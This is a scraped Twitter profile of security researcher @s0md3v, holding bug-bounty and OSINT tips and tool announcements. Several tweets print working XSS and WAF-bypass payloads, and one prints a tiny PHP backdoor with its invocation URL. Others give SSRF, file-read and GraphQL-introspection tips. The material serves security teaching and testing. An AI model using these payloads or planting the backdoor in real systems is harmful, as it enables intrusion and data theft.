Somdev Sangwan @s0md3v Twitter profile

Last Seen Profiles

@TrungHi39909132

@reallydrsam

@Sarith202142323

@siyasince

@planethempreal

@ChDankme

@rita_strack

@SantiMostaffa

@TammyNeal340861

@dahliacomms

@macxidy

@BishopStAlbans

@saandracalderon

@TheSafeAnnaAnon

@dude_deviant

@Greg_OConnor4

@BrennonT_

@DaveyGivens

@clairdekala

@DrAmandaAdams

@scientistdx

@UtreraXavi97273

@Pecintastw4050

@iamrahuloberoi

@DenyTheMark2020

@can19_12

@euthcai88

@RTC9S2EC9SDbAiF

@AVI_ONE_SERVICE

@originaldavidk

@y19999999

@peach2002_

@hailgrabovski

@PGS247_

@pasutri_plbg69

@_KNOW_LOVEYOU

Somdev Sangwan

@s0md3v

5 years

Learn Regex in 4 tweets :) cat matches cat ca+t matches caaaaaaaaaaaat but not ct ca*t matches caaaaaaaaaaaat and also ct ca{2,4} matches caat, caaat and caaaat c(at)+ matches catatatatatat c(at|orn) matches cat and corn c[ea] matches cat and cet c[ea]+ matches caaaat and ceeet

70

2K

6K

Somdev Sangwan

@s0md3v

2 years

🚨 ALERT 🚨 Python's ctx library and a fork of PHP's phpass have been compromised. 3 million users combined. The malicious code sends all the environment variables to a heroku app, likely to mine AWS credentials.

24

1K

2K

Somdev Sangwan

@s0md3v

4 years

Incident: Account hacked despite having 2FA Expectation: <some fancy technique> Reality: Website had no 2FA on "Password Reset" mechanism and the attacker got straight in. Sometimes bugs are too simple, hiding in plain sight.

25

418

2K

Somdev Sangwan

@s0md3v

2 years

Simple tip to find juicy assets that most hackers miss 🔥 1. Resolve all subdomains to IP addresses. Save IPs to list1.txt 2. Find the organization name uses in SSL certificates 3. Go to and search ssl:"Target Company"

48

389

1K

Somdev Sangwan

@s0md3v

5 years

Check if a server is running any vulnerable services wget https://raw.githubusercontent(.)com/vulnersCom/nmap-vulners/master/vulners.nse -O /usr/share/nmap/scripts/vulners.nse && nmap --script-updatedb All done, now you can do a scan with nmap -sV --script vulners <target>

11

533

1K

Somdev Sangwan

@s0md3v

3 years

So, my project "Arjun" is a part of Kali Linux now 🎉

52

56

1K

Somdev Sangwan

@s0md3v

4 years

2 Factor Authentication testing cheatsheet. I am not the author of this, forgot where I got this from.

3

439

1K

Somdev Sangwan

@s0md3v

2 years

Introducing "Smap", a drop-in replacement for Nmap powered by Github: Features: - no shodan account required - mimics nmap's arguments and output - supports oX/oG/oN outputs (and more) - fully passive, just 1 http request per host

35

421

1K

Somdev Sangwan

@s0md3v

2 years

The hacker after executing 'whoami' on my PC to check his privileges (I have replaced whoami with a command that prints the IP address and location of everyone connected to me and then says, "you tell me")

39

131

1K

Somdev Sangwan

@s0md3v

5 years

OSINT gang rise up 👉😎👈

19

251

1K

Somdev Sangwan

@s0md3v

1 year

I built a deepfake software that works from a single source image.

47

204

1K

Somdev Sangwan

@s0md3v

4 years

SSRF Break Points [1/2] - Anything that accepts a URL - File upload option? Change type="file" to type="url" and submit a URL. - Image upload? Submit a svg containing "image" element with the payload in xlink:href attribute. Try ImageMagick exploits.

6

368

1K

Somdev Sangwan

@s0md3v

2 years

Want to find XSS in a list of 100000 URLs? This will give you all the URLs that have parameters commonly vulnerable to XSS. cat urls.txt | uro | parth --pipe xss

10

291

956

Somdev Sangwan

@s0md3v

3 years

I created a tool that removes boring/duplicate URLs from a URL list. "uro" understands our pain, check the demo below :)

24

290

929

Somdev Sangwan

@s0md3v

3 years

I did something fun :D Here's the source code:

27

131

933

Somdev Sangwan

@s0md3v

5 years

Android Security - Day 1 1. Decompile an APK file: "apktool d <path of file>" 2. App dir. structure 3. Android partitions: 4. Android Internals (eBook):

Overview | Android Open Source Project

source.android.com

9

361

890

Somdev Sangwan

@s0md3v

4 years

I made Silver public, mass vulnerability scanner 🔥 Github: - Scans are resumable by default - Get notified on Slack if a vulnerability is found - Designed for large volume scans - Caches vuln. data to improve performance over time - Shodan integration

14

249

857

Somdev Sangwan

@s0md3v

5 years

I just made my "Corsy" public ❤️ It scans for all known misconfigurations in CORS implementations (currently 10+ checks). Github:

11

289

827

Somdev Sangwan

@s0md3v

6 years

Decodify's stable version is out now. Github: htts://github.com/UltimateHackers/Decodify It can automatically detect and decode different encodings, recursively. Supports: Base64, URL, StringFromChar, Hex, MD5, SHA1, SHA2, decimal, caesar cipher (ROT), reverse strings

16

353

814

Somdev Sangwan

@s0md3v

3 years

Created a tool for finding hidden endpoints, especially on APIs. It fetches JSON responses from @Burp_Suite history and creates a url paths wordlist from JSON keys. Github:

11

260

819

Somdev Sangwan

@s0md3v

3 years

It generates an email address and then prints any OTPs or confirmation links sent to it. Just enter 'ote' in your terminal and get your OTP. Github:

28

246

788

Somdev Sangwan

@s0md3v

5 years

Big news! I bypassed Google's search limiting CAPTCHA! No proxies, no delays and it always works! Writing a python library, brb 🔥 Meanwhile, suggest a good name for the library.

93

108

782

Somdev Sangwan

@s0md3v

5 years

Here's my research paper about bypassing WAFs for XSS ❤️

16

275

785

Somdev Sangwan

@s0md3v

5 years

"Goop : Google Search Scraper" - No thread limit - No reCAPTCHA - No scraping limit I apologize if you hoped for a fancy bypass and it's not up to the hype :)

16

281

770

Somdev Sangwan

@s0md3v

2 years

Multiple WAFs bypass that demonstrates various obfuscation techniques. <sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1//

17

232

759

Somdev Sangwan

@s0md3v

4 years

New year gift 🎉 Set up a free server to exploit blind vulnerabilities! 1. 2. sudo apt-get install apache2 pagekite 3. add "ServerName localhost" to /etc/apache2/apache2.conf 4. 80->8080 in /etc/apache2/ports.conf 5. pagekite 8080

10

275

743

Somdev Sangwan

@s0md3v

3 years

Reverse Proxies Cheat Sheet A list of reverse proxies, how to detect them, their behaviors and how to attack them.

GitHub - GrrrDog/weird_proxies: Reverse proxies cheatsheet

Reverse proxies cheatsheet. Contribute to GrrrDog/weird_proxies development by creating an account on GitHub.

github.com

2

275

751

Somdev Sangwan

@s0md3v

1 year

SubGPT is available for free now :) Good luck with your recon✨

18

219

737

Somdev Sangwan

@s0md3v

5 years

I M P O R T A N T This is a collection of nearly all known attack techniques against JWT. It also includes a tool to automate all checks and even a JWT primer.

Home

:snake: A toolkit for testing, tweaking and cracking JSON Web Tokens - ticarpi/jwt_tool

github.com

3

307

725

Somdev Sangwan

@s0md3v

4 years

I just released Parth ❤️ It finds commonly vulnerable parameter names to prioritize their testing. See screenshot below. You can import your @Burp_Suite history, discover URLs using CommonCrawl, OTX and Waybackmachine or a simple txt file. Github:

16

222

694

Somdev Sangwan

@s0md3v

5 years

Target has an android app? 1. Download it 2. Use Diggy () to extract URLs 3. Use Arjun () to find parameters on those URLs

GitHub - s0md3v/Arjun: HTTP parameter discovery suite.

HTTP parameter discovery suite. Contribute to s0md3v/Arjun development by creating an account on GitHub.

github.com

8

250

693

Somdev Sangwan

@s0md3v

6 years

Photon is a ridiculously fast crawler which extracts URLs, emails, website accounts, aws buckets, endpoints, files and more from a target. Github:

8

231

668

Somdev Sangwan

@s0md3v

6 years

A 147 char XSS polyglot which can break out of 20+ contexts Full size image: Source Code:

6

316

678

Somdev Sangwan

@s0md3v

5 years

CSRF Testing Mind Map ❤️

7

213

666

Somdev Sangwan

@s0md3v

3 years

If you find an SSRF vulnerability in an ASP application, try reading trace.axd file. It contains logs of HTTP requests, you can find sensitive information in there.

8

167

665

Somdev Sangwan

@s0md3v

6 years

More exotic payloads:

3

259

647

Somdev Sangwan

@s0md3v

3 years

Wrote a beginner friendly article about using shadows to guess the time a photo/video was shot at. If you already know this, I have demonstrated how to use length/angle ratios which you might find interesting. #osint #verification

12

168

602

Somdev Sangwan

@s0md3v

2 years

If anything happens to me - all my private tools and work will be uploaded here: I have set up a script that monitors my google, github and twitter activity. If I stay offline for 30 days, it will upload everything from my VPS to this google drive folder.

34

82

603

Somdev Sangwan

@s0md3v

3 years

I created a guide to give direction to folks interested in hacking and to talk about mental issues that people often face. Skim through it and let me know how it can be improved. Thanks.

GitHub - s0md3v/be-a-hacker: roadmap for a self-taught hacker

roadmap for a self-taught hacker. Contribute to s0md3v/be-a-hacker development by creating an account on GitHub.

github.com

19

168

598

Somdev Sangwan

@s0md3v

5 years

Just published the next article in the "Deblurring images for #OSINT " series. Experience in photo editing is not required :)

Deblurring images for OSINT — Part 2

Let’s reverse Pixelize blur.

s0md3v.medium.com

10

221

589

Somdev Sangwan

@s0md3v

6 years

Crafted this payload for quick tests. Its equipped with multiple filter bypass methods. I will upload a context breaking version polyglot tomorrow. <svg%0Ao%00nload=%09((pro\u006dpt))()//

7

232

586

Somdev Sangwan

@s0md3v

4 years

[ #OSINT ] Do you have a lead but not sure how to proceed? Check out these 6 flow charts for ideas. The following link contains flow charts for email, domain, username,location, telephone and real Name investigation.

5

187

583

Somdev Sangwan

@s0md3v

4 years

postMessage - a thread Each open tab in your browser is called a "window object" including iframes. postMessage is a JS feature that lets these windows talk to each other without caring about Same Origin Policy restrictions. To understand it well let's create two webpages...

9

176

573

Somdev Sangwan

@s0md3v

4 years

A really good white paper about common OAuth vulnerabilities & how to take care of them.

1

204

573

Somdev Sangwan

@s0md3v

5 years

Subdomain Enumeration 101 [1/2] 1. Use passive sources such as , , etc. 2. Search .example.com in code on Github (also finds sensitive stuff) 3. Use massdns with @Jhaddix 's all.txt ()

SecurityTrails | SecurityTrails: Data Security, Threat Hunting, and Attack Surface Management...

SecurityTrails enables you to explore complete current and historical data for any internet assets. IP & DNS history, domain, SSL and Open Port intelligence made easy

securitytrails.com

9

213

558

Somdev Sangwan

@s0md3v

5 years

Shodan Cheat Sheet hostname: title:"webcam login" net:13.227.143.0/24 os:"windows xp" port:80 city:tokyo org:microsoft country:IN (use abbreviations such US and NZ) has_screenshot:true (only returns results that have a screenshot available

5

146

549

Somdev Sangwan

@s0md3v

4 years

New attack vector against GraphQL 🔥 Basically, you can submit queries in bulk which makes it possible to bypass rate limits. Imagine being able to try thousands of passwords or OTPs in a single HTTP request. Kudos to @wallarm for this awesome research.

3

193

547

Somdev Sangwan

@s0md3v

4 years

Find domains that have "xyz" in their whois curl -H "User-Agent: Mozilla" "" | grep -Po "<tr><td>[^<]+</td>" | cut -d '>' -f3 | cut -d '<' -f1 🔥Handy use cases🔥 - "Microsoft Corporation" - "Elon Musk" - "someguy @gmail .com" ⚠️ use + instead of spaces

2

148

546

Somdev Sangwan

@s0md3v

3 years

OWASP Web Security Testing guide, very detailed 👌 Kudos to @kingthorin_rm and others for creating this resource, its definitely going in my top 10!

3

178

537

Somdev Sangwan

@s0md3v

2 years

<?=$_GET[p]==_&&$_GET[f]($GET_[c]) 35 bytes PHP backdoor protected by a password, supports arbitrary function calls. /backdoored.php?p=_&f=system&c=ls

8

164

540

Somdev Sangwan

@s0md3v

5 years

[OAuth Security] > Introduction: > Best practices: > Common attacks: > IRL Examples:

X (Formerly Twitter) disclosed on HackerOne: [Urgent] Invalidating...

First of all, really sorry for the unintentional DoS :( I was testing it with a fresh bearer token but copied the production one accidentally. #Details I've noticed that TweetDeck is using OAuth2...

hackerone.com

2

228

536

Somdev Sangwan

@s0md3v

4 years

Common RCE vulnerable parameters cmd exec command execute ping query jump code reg do func arg option load process step read function req feature exe module payload run print Credits: @trbughunters

3

174

532

Somdev Sangwan

@s0md3v

3 years

Do you guys prefer the single eye slit or three hole design when you are hacking?

61

62

525

Somdev Sangwan

@s0md3v

3 years

Created a tool to convert wordlists into different casing styles. It will make content discovery much more effective. Install: "go get github .com/s0md3v/dump/wl" Github:

8

127

523

Somdev Sangwan

@s0md3v

3 years

Tip✨ To anonymously share files from command line, you can add the following line to your ~/.bashrc file. alias up="curl -F 'f:1=<-' "

10

108

519

Somdev Sangwan

@s0md3v

3 years

A really comprehensive API security testing mind-map! Great work @dsopas <3

2

192

521

Somdev Sangwan

@s0md3v

5 years

[Tip] Create many accounts with one email :D A lot of web apps treat example @gmail .com and e.xam.ple @gmail .com as different emails but actually the emails sent to e.xam.ple @gmail .com will be received by example @gmail .com because gmail considers them the same email address.

16

183

499

Somdev Sangwan

@s0md3v

3 years

Found a way to read files on a remote computer? Check if you can access /var/cache/locate/locatedb or /var/lib/mlocate/mlocate.db file. It contains a list of all the files stored on the system. Download it and look for file names and file extensions you think are interesting.

9

124

497

Somdev Sangwan

@s0md3v

4 years

Wreck WAFs 😎 confirm() confirm`` (confirm``) {confirm``} [confirm``] (((confirm)))`` co\u006efirm() new class extends confirm``{} [8].find(confirm) [8].map(confirm) [8].some(confirm) [8].every(confirm) [8].filter(confirm) [8].findIndex(confirm) Source:

GitHub - s0md3v/AwesomeXSS: Awesome XSS stuff

Awesome XSS stuff. Contribute to s0md3v/AwesomeXSS development by creating an account on GitHub.

github.com

2

154

485

Somdev Sangwan

@s0md3v

3 years

Another domain check bypass! (12th, I am counting) Just add a dot after the domain name and it might bypass any domain name based checks, most likely blacklists. Credits: @Fox0x01 Explanation:

4

148

481

Somdev Sangwan

@s0md3v

4 years

Interesting file extensions to look for: action adr ascx asmx axd backup bak bkf bkp bok cache cfg cfm cgi cnf conf config crt csr csv dat doc docx eml env exe gz ica inf ini java json key log lst mai mbox mbx md mdb nsf old ora pac passwd pcf pdf pem pgp pl plist pwd rdp reg

12

189

468

Somdev Sangwan

@s0md3v

5 years

My favorite blogs ♥️ > > > > > > Share yours so we all can read and appreciate them :)

Jack Whitton - Latest Posts

Bug Bounty & Application Security

whitton.io

11

155

472

Somdev Sangwan

@s0md3v

3 years

ZoomEye is a platform similar to Shodan and it gives 10k free queries every month! Since, the free plan is quite decent, I will write a wrapper around it's API soon. This will be fun. ZoomEye:

5

96

468

Somdev Sangwan

@s0md3v

5 years

[Deserialization Attack Resources] Introductory Video: Paper: Write-ups: Cheatsheet:

Algolia disclosed on HackerOne: RCE on facebooksearch.algolia.com

While doing recon on Algolia, I found that the session secret for facebooksearch.algolia.com has been committed to a **public** GitHub repository. Since the Rails app running at...

hackerone.com

4

194

461

Somdev Sangwan

@s0md3v

4 years

DLL Hijacking for Dummies [1/2] > Download and run this process monitor () > Download and run target's desktop app > Look for processes with result "name not found" > Note down the paths of these processes

Process Monitor - Sysinternals

Monitor file system, Registry, process, thread and DLL activity in real-time.

learn.microsoft.com

7

160

459

Somdev Sangwan

@s0md3v

3 years

Arjun v2.0 is here 🎉 A lot of things have been changed, it's v2 for a reason. Make sure you read the wiki and report bugs :) Yes, you can import targets from BurpSuite now. Github:

6

127

456

Somdev Sangwan

@s0md3v

4 years

Learn at home! While corona virus outbreak is going on, we can stay at home and learn new things. I created this small library of resources for the same, please help me expand it for all of us. You can even reply to this tweet with resources ❤️

GitHub - s0md3v/be-a-hacker: roadmap for a self-taught hacker

roadmap for a self-taught hacker. Contribute to s0md3v/be-a-hacker development by creating an account on GitHub.

github.com

19

183

442

Somdev Sangwan

@s0md3v

5 years

It's quite easy to cheat in OSCP and CEH, you just need to contact the right people with enough money. A lot of Indians who did OSCP in the last 5 years cheated. People are obsessed with OSCP because it is respected by HRs. But man, there are a lot of fake OSCPs around.

Myk - 🇺🇦🌻🇵🇸🍉 - Here To Help

@mykola

5 years

Please quote this tweet with a thing that everyone in your field knows and nobody in your industry talks about because it would lead to general chaos.

1K

3K

14K

55

76

437

Somdev Sangwan

@s0md3v

2 years

smap - Shodan meets Nmap😎🤙 Right now this setup: - scans 5 hosts/second - gives vulnerability + service data (cpe+protocol+name) - can mimic nmap as shown in the video

13

105

435

Somdev Sangwan

@s0md3v

4 years

Practice Web Cache Poisoning 💯

DigiNinja - Web Cache Poisoning Lab

A lab to play with various web cache poisoning vulnerabilities.

poison.digi.ninja

2

174

430

Somdev Sangwan

@s0md3v

4 years

Found a GraphQL endpoint? Send the following query to list the whole schema of the endpoint. It will list all objects and the fields they have. {__schema{types{name,kind,description,fields{name,type{name}}}}} PS: It doesn't work if introspection is disabled.

3

129

423

Somdev Sangwan

@s0md3v

5 years

CSRF mind map ❤️ Source:

2

204

421

Somdev Sangwan

@s0md3v

4 years

I created a nmap compatible list of all vulnerable software from National Vulnerability Database. A modified version of it will be shipped with the next release of Silver. Dump: Dataset:

2

120

421

Somdev Sangwan

@s0md3v

4 years

Programming is not hard. It's all about learning about 20 basic things and then googling the errors you get or things you want to do e.g. "how to add two arrays in ruby?". Reposting this because I get this asked a lot.

Learn to code in less than a week

Programming is an amazing skill to have and I believe it’s essential if you want to be good at information security. With the magic of…

s0md3v.medium.com

9

112

410

Somdev Sangwan

@s0md3v

4 years

Pretty cool attack vector 👀 1. Send a HTTP request with bad headers 2. Server returns error page 3. The response gets cached 4. The cached response is served to users 5. ??? 6. Spicy Denial Of Service Learn More:

5

124

392

Somdev Sangwan

@s0md3v

3 years

SSRF testing mindmap by @hackerscrolls ❤️ Full resolution:

3

144

391

Somdev Sangwan

@s0md3v

5 years

[CORS Exploitation Resources] Presentation: Paper: Write-ups:

Full Account Takeover through CORS with connection Sockets

Hello guys , I’ll share with you an interesting bug in a private program of HackerOne.

medium.com

1

179

392

Somdev Sangwan

@s0md3v

5 years

[Advanced XSS Payload] Send source of current webpage to a remote server using <svg> and <img> elements. Obviously, let's say you just need to grab an email a from profile, you can do something like document.getElementById('email').innerHTML

6

123

388

Somdev Sangwan

@s0md3v

3 years

You only need two payloads to check for reflected-XSS. First a dummy string to check the contexts its being reflected in. Second to see if the character(s) required to break out of the contexts are being escaped or not. I can't believe people use payload lists and buy courses.

14

80

370

Somdev Sangwan

@s0md3v

6 years

I am in love with my own creation, isn't it beautiful? Should I make a github repo dedicated to XSS? I am also writing a book on XSS tho, I hope you will like that too :') <w="/x="y>"/ondblclick=`<`[confir\u006d``]>z

15

134

375

Somdev Sangwan

@s0md3v

2 years

6

35

374

Somdev Sangwan

@s0md3v

5 years

My write-up for the following vulnerabilities ^_^ CVE-2019-11387 CVE-2019-11388 CVE-2019-11389 CVE-2019-11390 CVE-2019-11391

How I found 5 ReDOS Vulnerabilities in Mod Security CRS

This write-up assumes that the reader has intermediate (or higher) knowledge of regular expressions. If you are not very familiar with…

s0md3v.medium.com

2

149

367

Somdev Sangwan

@s0md3v

4 years

Top 10 security issues in APIs, a Defcon 2020 talk. Skip to 11:44 if you are not into intros.

David Sopas | Paulo Silva - API (in)Security TOP 10: Guided tour -...

The speakers are waiting for your questions on the DEF CON Discord server!Join us (here: https://discord.gg/defcon), and join the channels:#asv-talks-qa-text...

www.youtube.com

2

101

370

Somdev Sangwan

@s0md3v

2 years

Arjun v2.2.0 is now live with changes that matter🎉 () - all known bugs have been fixed - it can now detect parameters that only respond to certain values e.g. "?admin=yes" - heuristics now scrapes all words from api responses

5

75

367

Somdev Sangwan

@s0md3v

4 years

I made "hardcodes". It searches source code for hardcoded strings. It can handle almost every syntax you throw at it and 20+ languages are officially supported. Available as a library and a cli program that has grep like interface. Gotta have that -r ;)

8

82

366

Somdev Sangwan

@s0md3v

4 years

Stealing data with CSS 🔥

CSS data exfiltration in Firefox via a single injection point - research.securitum.com

A few months ago I identified a security issue in Firefox known as CVE-2019-17016. During analysis of the issue, I’ve come up with a new technique of CSS data exfiltration in Firefox via a single...

research.securitum.com

0

138

358

Somdev Sangwan

@s0md3v

2 years

Here's my write-up for @intigriti x @ModSecurity hacking event. The blog highlights my thought process behind finding multiple RCE bypasses.

Bypassing ModSecurity for RCEs

Somdev Sangwan - Security & Automatation Researcher

s0md3v.github.io

5

131

361

Somdev Sangwan

@s0md3v

4 years

I am exploring fuzzing, started with this

The Fuzzing Book

Welcome to "The Fuzzing Book"! Software has bugs, and catching bugs can involve lots of effort. This book addresses this problem by automating software testing, specifically by generating tests...

www.fuzzingbook.org

1

121

359

Somdev Sangwan

@s0md3v

6 years

Here's the context breaking payload equipped with some tricks. -->'"/></sCript><svG x=">" onload=(co\u006efirm)``> If it doesn't execute in your browser, consider replacing `` with ()

3

154

350

Somdev Sangwan

@s0md3v

5 years

Find reports generated by various vulnerability scanners with this google dork. intitle:"report" ("qualys" | "acunetix" | "nessus" | "netsparker" | "nmap") filetype:pdf Source: @GoogleHacking

0

102

348

Somdev Sangwan

@s0md3v

3 years

Arjun 2.1.1 is out, on PyPi 🎉 - Export your results to BurpSuite! - New wordlists created with research - XML support - Custom fuzzing points in JSON and XML - Various bug fixes Install with: pip3 install arjun

6

77

344

Somdev Sangwan

@s0md3v

4 years

2019 was great [1/3] - Wrote ~15 tools, released 8 - Published 2 research papers - Did 2 big paid automation projects - Made it to top 30 python devs on Github - Got into OSINT and got out of depression - Worked > 24 hrs without sleep several times

5

21

349

Somdev Sangwan

@s0md3v

2 years

Arjun v2.1.5 is here🎉 - new "--disable-redirects" switch - new logic for handling redirections (prevents "processing" count go up forever) - fixed catastrophic backtracking in some regexes Github:

9

65

342

Somdev Sangwan

@s0md3v

1 year

I made a subdomain scanner powered by GPT.

5

45

340

Somdev Sangwan

@s0md3v

5 years

Sharing a regex I wrote to match MD2, MD4, MD5, SHA224, SHA256, SHA384, SHA512 in case someone needs it. ([a-fA-F0-9]{32}(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{16})?(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{32})?(?:[a-fA-F0-9]{32})?)

8

91

337

Somdev Sangwan

@s0md3v

4 years

I finally have an answer to the question, "How do we find API tokens scattered in a string?" Current solutions use shannon entropy and regular expressions to tackle this problem with horrible false positive/negative rate. I am publishing my algorithm tomorrow, here's a demo

8

69

334

Somdev Sangwan

@s0md3v

3 years

Are you stuck in a phase where you know you have important things to do but you can't get them done? Never having enough motivation to start them, losing focus after a short time or just doing nothing all day and then feeling bad about it? Been there, here's how I fixed things:

9

77

331

Somdev Sangwan

@s0md3v

4 years

Figuring out source of a file 👀 For example, If you download an image from Reddit, it will be saved as [a-z0-9]{13}.jpg Below is a list of such schemes that I made under 15 minutes: It's kinda useless but it's 5 AM and I just had to tweet it 👀